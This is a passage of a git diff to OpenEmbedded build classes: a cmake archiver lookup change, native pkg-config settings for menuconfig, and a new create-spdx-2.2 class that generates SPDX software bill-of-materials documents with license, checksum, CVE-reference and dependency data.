 set( CMAKE_ASM_COMPILER ${OECMAKE_C_COMPILER} )
-set( CMAKE_AR ${OECMAKE_AR} CACHE FILEPATH "Archiver" )
+find_program( CMAKE_AR ${OECMAKE_AR} DOC "Archiver" REQUIRED )
+
 set( CMAKE_C_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "CFLAGS" )
 set( CMAKE_CXX_FLAGS "${OECMAKE_CXX_FLAGS}" CACHE STRING "CXXFLAGS" )
 set( CMAKE_ASM_FLAGS "${OECMAKE_C_FLAGS}" CACHE STRING "ASM FLAGS" )
diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
     except OSError:
         mtime = 0
 
+    # setup native pkg-config variables (kconfig scripts call pkg-config directly, cannot generically be overriden to pkg-config-native)
+    d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
+    d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
+    d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
+    d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
+    # ensure that environment variables are overwritten with this tasks 'd' values
+    d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
+
     oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
                 d.getVar('PN') + ' Configuration', d)
 
diff --git a/meta/classes/create-spdx-2.2.bbclass b/meta/classes/create-spdx-2.2.bbclass
new file mode 100644
index 0000000000..42b693d586
--- /dev/null
+++ b/meta/classes/create-spdx-2.2.bbclass
@@ -0,0 +1,1067 @@
+#
+# Copyright OpenEmbedded Contributors
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+DEPLOY_DIR_SPDX ??= "${DEPLOY_DIR}/spdx/${MACHINE}"
+
+# The product name that the CVE database uses.  Defaults to BPN, but may need to
+# be overriden per recipe (for example tiff.bb sets CVE_PRODUCT=libtiff).
+CVE_PRODUCT ??= "${BPN}"
+CVE_VERSION ??= "${PV}"
+
+SPDXDIR ??= "${WORKDIR}/spdx"
+SPDXDEPLOY = "${SPDXDIR}/deploy"
+SPDXWORK = "${SPDXDIR}/work"
+SPDXIMAGEWORK = "${SPDXDIR}/image-work"
+SPDXSDKWORK = "${SPDXDIR}/sdk-work"
+
+SPDX_TOOL_NAME ??= "oe-spdx-creator"
+SPDX_TOOL_VERSION ??= "1.0"
+
+SPDXRUNTIMEDEPLOY = "${SPDXDIR}/runtime-deploy"
+
+SPDX_INCLUDE_SOURCES ??= "0"
+SPDX_ARCHIVE_SOURCES ??= "0"
+SPDX_ARCHIVE_PACKAGED ??= "0"
+
+SPDX_UUID_NAMESPACE ??= "sbom.openembedded.org"
+SPDX_NAMESPACE_PREFIX ??= "http://spdx.org/spdxdoc"
+SPDX_PRETTY ??= "0"
+
+SPDX_LICENSES ??= "${COREBASE}/meta/files/spdx-licenses.json"
+
+SPDX_CUSTOM_ANNOTATION_VARS ??= ""
+
+SPDX_ORG ??= "OpenEmbedded ()"
+SPDX_SUPPLIER ??= "Organization: ${SPDX_ORG}"
+SPDX_SUPPLIER[doc] = "The SPDX PackageSupplier field for SPDX packages created from \
+    this recipe. For SPDX documents create using this class during the build, this \
+    is the contact information for the person or organization who is doing the \
+    build."
+
+def extract_licenses(filename):
+    import re
+
+    lic_regex = re.compile(rb'^\W*SPDX-License-Identifier:\s*([ \w\d.()+-]+?)(?:\s+\W*)?$', re.MULTILINE)
+
+    try:
+        with open(filename, 'rb') as f:
+            size = min(15000, os.stat(filename).st_size)
+            txt = f.read(size)
+            licenses = re.findall(lic_regex, txt)
+            if licenses:
+                ascii_licenses = [lic.decode('ascii') for lic in licenses]
+                return ascii_licenses
+    except Exception as e:
+        bb.warn(f"Exception reading {filename}: {e}")
+    return None
+
+def get_doc_namespace(d, doc):
+    import uuid
+    namespace_uuid = uuid.uuid5(uuid.NAMESPACE_DNS, d.getVar("SPDX_UUID_NAMESPACE"))
+    return "%s/%s-%s" % (d.getVar("SPDX_NAMESPACE_PREFIX"), doc.name, str(uuid.uuid5(namespace_uuid, doc.name)))
+
+def create_annotation(d, comment):
+    from datetime import datetime, timezone
+
+    creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+    annotation = oe.spdx.SPDXAnnotation()
+    annotation.annotationDate = creation_time
+    annotation.annotationType = "OTHER"
+    annotation.annotator = "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION"))
+    annotation.comment = comment
+    return annotation
+
+def recipe_spdx_is_native(d, recipe):
+    return any(a.annotationType == "OTHER" and
+      a.annotator == "Tool: %s - %s" % (d.getVar("SPDX_TOOL_NAME"), d.getVar("SPDX_TOOL_VERSION")) and
+      a.comment == "isNative" for a in recipe.annotations)
+
+def is_work_shared_spdx(d):
+    return bb.data.inherits_class('kernel', d) or ('work-shared' in d.getVar('WORKDIR'))
+
+def get_json_indent(d):
+    if d.getVar("SPDX_PRETTY") == "1":
+        return 2
+    return None
+
+python() {
+    import json
+    if d.getVar("SPDX_LICENSE_DATA"):
+        return
+
+    with open(d.getVar("SPDX_LICENSES"), "r") as f:
+        data = json.load(f)
+        # Transform the license array to a dictionary
+        data["licenses"] = {l["licenseId"]: l for l in data["licenses"]}
+        d.setVar("SPDX_LICENSE_DATA", data)
+}
+
+def convert_license_to_spdx(lic, document, d, existing={}):
+    from pathlib import Path
+    import oe.spdx
+
+    license_data = d.getVar("SPDX_LICENSE_DATA")
+    extracted = {}
+
+    def add_extracted_license(ident, name):
+        nonlocal document
+
+        if name in extracted:
+            return
+
+        extracted_info = oe.spdx.SPDXExtractedLicensingInfo()
+        extracted_info.name = name
+        extracted_info.licenseId = ident
+        extracted_info.extractedText = None
+
+        if name == "PD":
+            # Special-case this.
+            extracted_info.extractedText = "Software released to the public domain"
+        else:
+            # Seach for the license in COMMON_LICENSE_DIR and LICENSE_PATH
+            for directory in [d.getVar('COMMON_LICENSE_DIR')] + (d.getVar('LICENSE_PATH') or '').split():
+                try:
+                    with (Path(directory) / name).open(errors="replace") as f:
+                        extracted_info.extractedText = f.read()
+                        break
+                except FileNotFoundError:
+                    pass
+            if extracted_info.extractedText is None:
+                # If it's not SPDX or PD, then NO_GENERIC_LICENSE must be set
+                filename = d.getVarFlag('NO_GENERIC_LICENSE', name)
+                if filename:
+                    filename = d.expand("${S}/" + filename)
+                    with open(filename, errors="replace") as f:
+                        extracted_info.extractedText = f.read()
+                else:
+                    bb.error("Cannot find any text for license %s" % name)
+
+        extracted[name] = extracted_info
+        document.hasExtractedLicensingInfos.append(extracted_info)
+
+    def convert(l):
+        if l == "(" or l == ")":
+            return l
+
+        if l == "&":
+            return "AND"
+
+        if l == "|":
+            return "OR"
+
+        if l == "CLOSED":
+            return "NONE"
+
+        spdx_license = d.getVarFlag("SPDXLICENSEMAP", l) or l
+        if spdx_license in license_data["licenses"]:
+            return spdx_license
+
+        try:
+            spdx_license = existing[l]
+        except KeyError:
+            spdx_license = "LicenseRef-" + l
+            add_extracted_license(spdx_license, l)
+
+        return spdx_license
+
+    lic_split = lic.replace("(", " ( ").replace(")", " ) ").split()
+
+    return ' '.join(convert(l) for l in lic_split)
+
+def process_sources(d):
+    pn = d.getVar('PN')
+    assume_provided = (d.getVar("ASSUME_PROVIDED") or "").split()
+    if pn in assume_provided:
+        for p in d.getVar("PROVIDES").split():
+            if p != pn:
+                pn = p
+                break
+
+    # glibc-locale: do_fetch, do_unpack and do_patch tasks have been deleted,
+    # so avoid archiving source here.
+    if pn.startswith('glibc-locale'):
+        return False
+    if d.getVar('PN') == "libtool-cross":
+        return False
+    if d.getVar('PN') == "libgcc-initial":
+        return False
+    if d.getVar('PN') == "shadow-sysroot":
+        return False
+
+    # We just archive gcc-source for all the gcc related recipes
+    if d.getVar('BPN') in ['gcc', 'libgcc']:
+        bb.debug(1, 'spdx: There is bug in scan of %s is, do nothing' % pn)
+        return False
+
+    return True
+
+
+def add_package_files(d, doc, spdx_pkg, topdir, get_spdxid, get_types, *, archive=None, ignore_dirs=[], ignore_top_level_dirs=[]):
+    from pathlib import Path
+    import oe.spdx
+    import hashlib
+
+    source_date_epoch = d.getVar("SOURCE_DATE_EPOCH")
+    if source_date_epoch:
+        source_date_epoch = int(source_date_epoch)
+
+    sha1s = []
+    spdx_files = []
+
+    file_counter = 1
+    for subdir, dirs, files in os.walk(topdir):
+        dirs[:] = [d for d in dirs if d not in ignore_dirs]
+        if subdir == str(topdir):
+            dirs[:] = [d for d in dirs if d not in ignore_top_level_dirs]
+
+        for file in files:
+            filepath = Path(subdir) / file
+            filename = str(filepath.relative_to(topdir))
+
+            if not filepath.is_symlink() and filepath.is_file():
+                spdx_file = oe.spdx.SPDXFile()
+                spdx_file.SPDXID = get_spdxid(file_counter)
+                for t in get_types(filepath):
+                    spdx_file.fileTypes.append(t)
+                spdx_file.fileName = filename
+
+                if archive is not None:
+                    with filepath.open("rb") as f:
+                        info = archive.gettarinfo(fileobj=f)
+                        info.name = filename
+                        info.uid = 0
+                        info.gid = 0
+                        info.uname = "root"
+                        info.gname = "root"
+
+                        if source_date_epoch is not None and info.mtime > source_date_epoch:
+                            info.mtime = source_date_epoch
+
+                        archive.addfile(info, f)
+
+                sha1 = bb.utils.sha1_file(filepath)
+                sha1s.append(sha1)
+                spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+                        algorithm="SHA1",
+                        checksumValue=sha1,
+                    ))
+                spdx_file.checksums.append(oe.spdx.SPDXChecksum(
+                        algorithm="SHA256",
+                        checksumValue=bb.utils.sha256_file(filepath),
+                    ))
+
+                if "SOURCE" in spdx_file.fileTypes:
+                    extracted_lics = extract_licenses(filepath)
+                    if extracted_lics:
+                        spdx_file.licenseInfoInFiles = extracted_lics
+
+                doc.files.append(spdx_file)
+                doc.add_relationship(spdx_pkg, "CONTAINS", spdx_file)
+                spdx_pkg.hasFiles.append(spdx_file.SPDXID)
+
+                spdx_files.append(spdx_file)
+
+                file_counter += 1
+
+    sha1s.sort()
+    verifier = hashlib.sha1()
+    for v in sha1s:
+        verifier.update(v.encode("utf-8"))
+    spdx_pkg.packageVerificationCode.packageVerificationCodeValue = verifier.hexdigest()
+
+    return spdx_files
+
+
+def add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources):
+    from pathlib import Path
+    import hashlib
+    import oe.packagedata
+    import oe.spdx
+
+    debug_search_paths = [
+        Path(d.getVar('PKGD')),
+        Path(d.getVar('STAGING_DIR_TARGET')),
+        Path(d.getVar('STAGING_DIR_NATIVE')),
+        Path(d.getVar('STAGING_KERNEL_DIR')),
+    ]
+
+    pkg_data = oe.packagedata.read_subpkgdata_extended(package, d)
+
+    if pkg_data is None:
+        return
+
+    for file_path, file_data in pkg_data["files_info"].items():
+        if not "debugsrc" in file_data:
+            continue
+
+        for pkg_file in package_files:
+            if file_path.lstrip("/") == pkg_file.fileName.lstrip("/"):
+                break
+        else:
+            bb.fatal("No package file found for %s" % str(file_path))
+            continue
+
+        for debugsrc in file_data["debugsrc"]:
+            ref_id = "NOASSERTION"
+            for search in debug_search_paths:
+                if debugsrc.startswith("/usr/src/kernel"):
+                    debugsrc_path = search / debugsrc.replace('/usr/src/kernel/', '')
+                else:
+                    debugsrc_path = search / debugsrc.lstrip("/")
+                if not debugsrc_path.exists():
+                    continue
+
+                file_sha256 = bb.utils.sha256_file(debugsrc_path)
+
+                if file_sha256 in sources:
+                    source_file = sources[file_sha256]
+
+                    doc_ref = package_doc.find_external_document_ref(source_file.doc.documentNamespace)
+                    if doc_ref is None:
+                        doc_ref = oe.spdx.SPDXExternalDocumentRef()
+                        doc_ref.externalDocumentId = "DocumentRef-dependency-" + source_file.doc.name
+                        doc_ref.spdxDocument = source_file.doc.documentNamespace
+                        doc_ref.checksum.algorithm = "SHA1"
+                        doc_ref.checksum.checksumValue = source_file.doc_sha1
+                        package_doc.externalDocumentRefs.append(doc_ref)
+
+                    ref_id = "%s:%s" % (doc_ref.externalDocumentId, source_file.file.SPDXID)
+                else:
+                    bb.debug(1, "Debug source %s with SHA256 %s not found in any dependency" % (str(debugsrc_path), file_sha256))
+                break
+            else:
+                bb.debug(1, "Debug source %s not found" % debugsrc)
+
+            package_doc.add_relationship(pkg_file, "GENERATED_FROM", ref_id, comment=debugsrc)
+
+def collect_dep_recipes(d, doc, spdx_recipe):
+    from pathlib import Path
+    import oe.sbom
+    import oe.spdx
+
+    deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+    dep_recipes = []
+    taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+    deps = sorted(set(
+        dep[0] for dep in taskdepdata.values() if
+            dep[1] == "do_create_spdx" and dep[0] != d.getVar("PN")
+    ))
+    for dep_pn in deps:
+        dep_recipe_path = deploy_dir_spdx / "recipes" / ("recipe-%s.spdx.json" % dep_pn)
+
+        spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_recipe_path)
+
+        for pkg in spdx_dep_doc.packages:
+            if pkg.name == dep_pn:
+                spdx_dep_recipe = pkg
+                break
+        else:
+            continue
+
+        dep_recipes.append(oe.sbom.DepRecipe(spdx_dep_doc, spdx_dep_sha1, spdx_dep_recipe))
+
+        dep_recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+        dep_recipe_ref.externalDocumentId = "DocumentRef-dependency-" + spdx_dep_doc.name
+        dep_recipe_ref.spdxDocument = spdx_dep_doc.documentNamespace
+        dep_recipe_ref.checksum.algorithm = "SHA1"
+        dep_recipe_ref.checksum.checksumValue = spdx_dep_sha1
+
+        doc.externalDocumentRefs.append(dep_recipe_ref)
+
+        doc.add_relationship(
+            "%s:%s" % (dep_recipe_ref.externalDocumentId, spdx_dep_recipe.SPDXID),
+            "BUILD_DEPENDENCY_OF",
+            spdx_recipe
+        )
+
+    return dep_recipes
+
+collect_dep_recipes[vardepsexclude] += "BB_TASKDEPDATA"
+collect_dep_recipes[vardeps] += "DEPENDS"
+
+def collect_dep_sources(d, dep_recipes):
+    import oe.sbom
+
+    sources = {}
+    for dep in dep_recipes:
+        # Don't collect sources from native recipes as they
+        # match non-native sources also.
+        if recipe_spdx_is_native(d, dep.recipe):
+            continue
+        recipe_files = set(dep.recipe.hasFiles)
+
+        for spdx_file in dep.doc.files:
+            if spdx_file.SPDXID not in recipe_files:
+                continue
+
+            if "SOURCE" in spdx_file.fileTypes:
+                for checksum in spdx_file.checksums:
+                    if checksum.algorithm == "SHA256":
+                        sources[checksum.checksumValue] = oe.sbom.DepSource(dep.doc, dep.doc_sha1, dep.recipe, spdx_file)
+                        break
+
+    return sources
+
+def add_download_packages(d, doc, recipe):
+    import os.path
+    from bb.fetch2 import decodeurl, CHECKSUM_LIST
+    import bb.process
+    import oe.spdx
+    import oe.sbom
+
+    for download_idx, src_uri in enumerate(d.getVar('SRC_URI').split()):
+        f = bb.fetch2.FetchData(src_uri, d)
+
+        for name in f.names:
+            package = oe.spdx.SPDXPackage()
+            package.name = "%s-source-%d" % (d.getVar("PN"), download_idx + 1)
+            package.SPDXID = oe.sbom.get_download_spdxid(d, download_idx + 1)
+
+            if f.type == "file":
+                continue
+
+            uri = f.type
+            proto = getattr(f, "proto", None)
+            if proto is not None:
+                uri = uri + "+" + proto
+            uri = uri + "://" + f.host + f.path
+
+            if f.method.supports_srcrev():
+                uri = uri + "@" + f.revisions[name]
+
+            if f.method.supports_checksum(f):
+                for checksum_id in CHECKSUM_LIST:
+                    if checksum_id.upper() not in oe.spdx.SPDXPackage.ALLOWED_CHECKSUMS:
+                        continue
+
+                    expected_checksum = getattr(f, "%s_expected" % checksum_id)
+                    if expected_checksum is None:
+                        continue
+
+                    c = oe.spdx.SPDXChecksum()
+                    c.algorithm = checksum_id.upper()
+                    c.checksumValue = expected_checksum
+                    package.checksums.append(c)
+
+            package.downloadLocation = uri
+            doc.packages.append(package)
+            doc.add_relationship(doc, "DESCRIBES", package)
+            # In the future, we might be able to do more fancy dependencies,
+            # but this should be sufficient for now
+            doc.add_relationship(package, "BUILD_DEPENDENCY_OF", recipe)
+
+python do_create_spdx() {
+    from datetime import datetime, timezone
+    import oe.sbom
+    import oe.spdx
+    import uuid
+    from pathlib import Path
+    from contextlib import contextmanager
+    import oe.cve_check
+
+    @contextmanager
+    def optional_tarfile(name, guard, mode="w"):
+        import tarfile
+        import gzip
+
+        if guard:
+            name.parent.mkdir(parents=True, exist_ok=True)
+            with gzip.open(name, mode=mode + "b") as f:
+                with tarfile.open(fileobj=f, mode=mode + "|") as tf:
+                    yield tf
+        else:
+            yield None
+
+
+    deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+    spdx_workdir = Path(d.getVar("SPDXWORK"))
+    include_sources = d.getVar("SPDX_INCLUDE_SOURCES") == "1"
+    archive_sources = d.getVar("SPDX_ARCHIVE_SOURCES") == "1"
+    archive_packaged = d.getVar("SPDX_ARCHIVE_PACKAGED") == "1"
+
+    creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+    doc = oe.spdx.SPDXDocument()
+
+    doc.name = "recipe-" + d.getVar("PN")
+    doc.documentNamespace = get_doc_namespace(d, doc)
+    doc.creationInfo.created = creation_time
+    doc.creationInfo.comment = "This document was created by analyzing recipe files during the build."
+    doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+    doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+    doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+    doc.creationInfo.creators.append("Person: N/A ()")
+
+    recipe = oe.spdx.SPDXPackage()
+    recipe.name = d.getVar("PN")
+    recipe.versionInfo = d.getVar("PV")
+    recipe.SPDXID = oe.sbom.get_recipe_spdxid(d)
+    recipe.supplier = d.getVar("SPDX_SUPPLIER")
+    if bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d):
+        recipe.annotations.append(create_annotation(d, "isNative"))
+
+    homepage = d.getVar("HOMEPAGE")
+    if homepage:
+        recipe.homepage = homepage
+
+    license = d.getVar("LICENSE")
+    if license:
+        recipe.licenseDeclared = convert_license_to_spdx(license, doc, d)
+
+    summary = d.getVar("SUMMARY")
+    if summary:
+        recipe.summary = summary
+
+    description = d.getVar("DESCRIPTION")
+    if description:
+        recipe.description = description
+
+    if d.getVar("SPDX_CUSTOM_ANNOTATION_VARS"):
+        for var in d.getVar('SPDX_CUSTOM_ANNOTATION_VARS').split():
+            recipe.annotations.append(create_annotation(d, var + "=" + d.getVar(var)))
+
+    # Some CVEs may be patched during the build process without incrementing the version number,
+    # so querying for CVEs based on the CPE id can lead to false positives. To account for this,
+    # save the CVEs fixed by patches to source information field in the SPDX.
+    patched_cves = oe.cve_check.get_patched_cves(d)
+    patched_cves = list(patched_cves)
+    patched_cves = ' '.join(patched_cves)
+    if patched_cves:
+        recipe.sourceInfo = "CVEs fixed: " + patched_cves
+
+    cpe_ids = oe.cve_check.get_cpe_ids(d.getVar("CVE_PRODUCT"), d.getVar("CVE_VERSION"))
+    if cpe_ids:
+        for cpe_id in cpe_ids:
+            cpe = oe.spdx.SPDXExternalReference()
+            cpe.referenceCategory = "SECURITY"
+            cpe.referenceType = "http://spdx.org/rdf/references/cpe23Type"
+            cpe.referenceLocator = cpe_id
+            recipe.externalRefs.append(cpe)
+
+    doc.packages.append(recipe)
+    doc.add_relationship(doc, "DESCRIBES", recipe)
+
+    add_download_packages(d, doc, recipe)
+
+    if process_sources(d) and include_sources:
+        recipe_archive = deploy_dir_spdx / "recipes" / (doc.name + ".tar.gz")
+        with optional_tarfile(recipe_archive, archive_sources) as archive:
+            spdx_get_src(d)
+
+            add_package_files(
+                d,
+                doc,
+                recipe,
+                spdx_workdir,
+                lambda file_counter: "SPDXRef-SourceFile-%s-%d" % (d.getVar("PN"), file_counter),
+                lambda filepath: ["SOURCE"],
+                ignore_dirs=[".git"],
+                ignore_top_level_dirs=["temp"],
+                archive=archive,
+            )
+
+            if archive is not None:
+                recipe.packageFileName = str(recipe_archive.name)
+
+    dep_recipes = collect_dep_recipes(d, doc, recipe)
+
+    doc_sha1 = oe.sbom.write_doc(d, doc, "recipes", indent=get_json_indent(d))
+    dep_recipes.append(oe.sbom.DepRecipe(doc, doc_sha1, recipe))
+
+    recipe_ref = oe.spdx.SPDXExternalDocumentRef()
+    recipe_ref.externalDocumentId = "DocumentRef-recipe-" + recipe.name
+    recipe_ref.spdxDocument = doc.documentNamespace
+    recipe_ref.checksum.algorithm = "SHA1"
+    recipe_ref.checksum.checksumValue = doc_sha1
+
+    sources = collect_dep_sources(d, dep_recipes)
+    found_licenses = {license.name:recipe_ref.externalDocumentId + ":" + license.licenseId for license in doc.hasExtractedLicensingInfos}
+
+    if not recipe_spdx_is_native(d, recipe):
+        bb.build.exec_func("read_subpackage_metadata", d)
+
+        pkgdest = Path(d.getVar("PKGDEST"))
+        for package in d.getVar("PACKAGES").split():
+            if not oe.packagedata.packaged(package, d):
+                continue
+
+            package_doc = oe.spdx.SPDXDocument()
+            pkg_name = d.getVar("PKG:%s" % package) or package
+            package_doc.name = pkg_name
+            package_doc.documentNamespace = get_doc_namespace(d, package_doc)
+            package_doc.creationInfo.created = creation_time
+            package_doc.creationInfo.comment = "This document was created by analyzing packages created during the build."
+            package_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+            package_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+            package_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+            package_doc.creationInfo.creators.append("Person: N/A ()")
+            package_doc.externalDocumentRefs.append(recipe_ref)
+
+            package_license = d.getVar("LICENSE:%s" % package) or d.getVar("LICENSE")
+
+            spdx_package = oe.spdx.SPDXPackage()
+
+            spdx_package.SPDXID = oe.sbom.get_package_spdxid(pkg_name)
+            spdx_package.name = pkg_name
+            spdx_package.versionInfo = d.getVar("PV")
+            spdx_package.licenseDeclared = convert_license_to_spdx(package_license, package_doc, d, found_licenses)
+            spdx_package.supplier = d.getVar("SPDX_SUPPLIER")
+
+            package_doc.packages.append(spdx_package)
+
+            package_doc.add_relationship(spdx_package, "GENERATED_FROM", "%s:%s" % (recipe_ref.externalDocumentId, recipe.SPDXID))
+            package_doc.add_relationship(package_doc, "DESCRIBES", spdx_package)
+
+            package_archive = deploy_dir_spdx / "packages" / (package_doc.name + ".tar.gz")
+            with optional_tarfile(package_archive, archive_packaged) as archive:
+                package_files = add_package_files(
+                    d,
+                    package_doc,
+                    spdx_package,
+                    pkgdest / package,
+                    lambda file_counter: oe.sbom.get_packaged_file_spdxid(pkg_name, file_counter),
+                    lambda filepath: ["BINARY"],
+                    ignore_top_level_dirs=['CONTROL', 'DEBIAN'],
+                    archive=archive,
+                )
+
+                if archive is not None:
+                    spdx_package.packageFileName = str(package_archive.name)
+
+            add_package_sources_from_debug(d, package_doc, spdx_package, package, package_files, sources)
+
+            oe.sbom.write_doc(d, package_doc, "packages", indent=get_json_indent(d))
+}
+# NOTE: depending on do_unpack is a hack that is necessary to get it's dependencies for archive the source
+addtask do_create_spdx after do_package do_packagedata do_unpack before do_populate_sdk do_build do_rm_work
+
+SSTATETASKS += "do_create_spdx"
+do_create_spdx[sstate-inputdirs] = "${SPDXDEPLOY}"
+do_create_spdx[sstate-outputdirs] = "${DEPLOY_DIR_SPDX}"
+
+python do_create_spdx_setscene () {
+    sstate_setscene(d)
+}
+addtask do_create_spdx_setscene
+
+do_create_spdx[dirs] = "${SPDXWORK}"
+do_create_spdx[cleandirs] = "${SPDXDEPLOY} ${SPDXWORK}"
+do_create_spdx[depends] += "${PATCHDEPENDENCY}"
+do_create_spdx[deptask] = "do_create_spdx"
+
+def collect_package_providers(d):
+    from pathlib import Path
+    import oe.sbom
+    import oe.spdx
+    import json
+
+    deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+
+    providers = {}
+
+    taskdepdata = d.getVar("BB_TASKDEPDATA", False)
+    deps = sorted(set(
+        dep[0] for dep in taskdepdata.values() if dep[0] != d.getVar("PN")
+    ))
+    deps.append(d.getVar("PN"))
+
+    for dep_pn in deps:
+        recipe_data = oe.packagedata.read_pkgdata(dep_pn, d)
+
+        for pkg in recipe_data.get("PACKAGES", "").split():
+
+            pkg_data = oe.packagedata.read_subpkgdata_dict(pkg, d)
+            rprovides = set(n for n, _ in bb.utils.explode_dep_versions2(pkg_data.get("RPROVIDES", "")).items())
+            rprovides.add(pkg)
+
+            for r in rprovides:
+                providers[r] = pkg
+
+    return providers
+
+collect_package_providers[vardepsexclude] += "BB_TASKDEPDATA"
+
+python do_create_runtime_spdx() {
+    from datetime import datetime, timezone
+    import oe.sbom
+    import oe.spdx
+    import oe.packagedata
+    from pathlib import Path
+
+    deploy_dir_spdx = Path(d.getVar("DEPLOY_DIR_SPDX"))
+    spdx_deploy = Path(d.getVar("SPDXRUNTIMEDEPLOY"))
+    is_native = bb.data.inherits_class("native", d) or bb.data.inherits_class("cross", d)
+
+    creation_time = datetime.now(tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
+
+    providers = collect_package_providers(d)
+
+    if not is_native:
+        bb.build.exec_func("read_subpackage_metadata", d)
+
+        dep_package_cache = {}
+
+        pkgdest = Path(d.getVar("PKGDEST"))
+        for package in d.getVar("PACKAGES").split():
+            localdata = bb.data.createCopy(d)
+            pkg_name = d.getVar("PKG:%s" % package) or package
+            localdata.setVar("PKG", pkg_name)
+            localdata.setVar('OVERRIDES', d.getVar("OVERRIDES", False) + ":" + package)
+
+            if not oe.packagedata.packaged(package, localdata):
+                continue
+
+            pkg_spdx_path = deploy_dir_spdx / "packages" / (pkg_name + ".spdx.json")
+
+            package_doc, package_doc_sha1 = oe.sbom.read_doc(pkg_spdx_path)
+
+            for p in package_doc.packages:
+                if p.name == pkg_name:
+                    spdx_package = p
+                    break
+            else:
+                bb.fatal("Package '%s' not found in %s" % (pkg_name, pkg_spdx_path))
+
+            runtime_doc = oe.spdx.SPDXDocument()
+            runtime_doc.name = "runtime-" + pkg_name
+            runtime_doc.documentNamespace = get_doc_namespace(localdata, runtime_doc)
+            runtime_doc.creationInfo.created = creation_time
+            runtime_doc.creationInfo.comment = "This document was created by analyzing package runtime dependencies."
+            runtime_doc.creationInfo.licenseListVersion = d.getVar("SPDX_LICENSE_DATA")["licenseListVersion"]
+            runtime_doc.creationInfo.creators.append("Tool: OpenEmbedded Core create-spdx.bbclass")
+            runtime_doc.creationInfo.creators.append("Organization: %s" % d.getVar("SPDX_ORG"))
+            runtime_doc.creationInfo.creators.append("Person: N/A ()")
+
+            package_ref = oe.spdx.SPDXExternalDocumentRef()
+            package_ref.externalDocumentId = "DocumentRef-package-" + package
+            package_ref.spdxDocument = package_doc.documentNamespace
+            package_ref.checksum.algorithm = "SHA1"
+            package_ref.checksum.checksumValue = package_doc_sha1
+
+            runtime_doc.externalDocumentRefs.append(package_ref)
+
+            runtime_doc.add_relationship(
+                runtime_doc.SPDXID,
+                "AMENDS",
+                "%s:%s" % (package_ref.externalDocumentId, package_doc.SPDXID)
+            )
+
+            deps = bb.utils.explode_dep_versions2(localdata.getVar("RDEPENDS") or "")
+            seen_deps = set()
+            for dep, _ in deps.items():
+                if dep in seen_deps:
+                    continue
+
+                if dep not in providers:
+                    continue
+
+                dep = providers[dep]
+
+                if not oe.packagedata.packaged(dep, localdata):
+                    continue
+
+                dep_pkg_data = oe.packagedata.read_subpkgdata_dict(dep, d)
+                dep_pkg = dep_pkg_data["PKG"]
+
+                if dep in dep_package_cache:
+                    (dep_spdx_package, dep_package_ref) = dep_package_cache[dep]
+                else:
+                    dep_path = deploy_dir_spdx / "packages" / ("%s.spdx.json" % dep_pkg)
+
+                    spdx_dep_doc, spdx_dep_sha1 = oe.sbom.read_doc(dep_path)
+
+                    for pkg in spdx_dep_doc.packages:
+                        if pkg.name == dep_pkg:
+                            dep_spdx_package = pkg
+                            break
+                    else:
+                        bb.fatal("Package '%s' not found in %s" % (dep_pkg, dep_path))
+
+                    dep_package_ref = oe.spdx.SPDXExternalDocumentRef()
+                    dep_package_ref.externalDocumentId = "DocumentRef-runtime-dependency-" + spdx_dep_doc.name
+                    dep_package_ref.spdxDocument = spdx_dep_doc.documentNamespace
+                    dep_package_ref.checksum.algorithm = "SHA1"
+                    dep_package_ref.checksum.checksumValue = spdx_dep_sha1
+
+                    dep_package_cache[dep] = (dep_spdx_package, dep_package_ref)
+
+                runtime_doc.externalDocumentRefs.append(dep_package_ref)
+
+                runtime_doc.add_relationship(
+                    "%s:%s" % (dep_package_ref.externalDocumentId, dep_spdx_package.SPDXID),
+                    "RUNTIME_DEPENDENCY_OF",
+                    "%s:%s" % (package_ref.externalDocumentId, spdx_package.SPDXID)
+                )
+                seen_deps.add(dep)
+
+            oe.sbom.write_doc(d, runtime_doc, "runtime", spdx_deploy, indent=get_json_indent(d))
+}
+
+addtask do_create_runtime_spdx after do_create_spdx before do_build do_rm_work
+SSTATETASKS += "do_create_runtime_spdx"
+do_create_runtime_spdx[sstate-inputdirs] = "${SPDXRUNTIMEDEPLOY}"
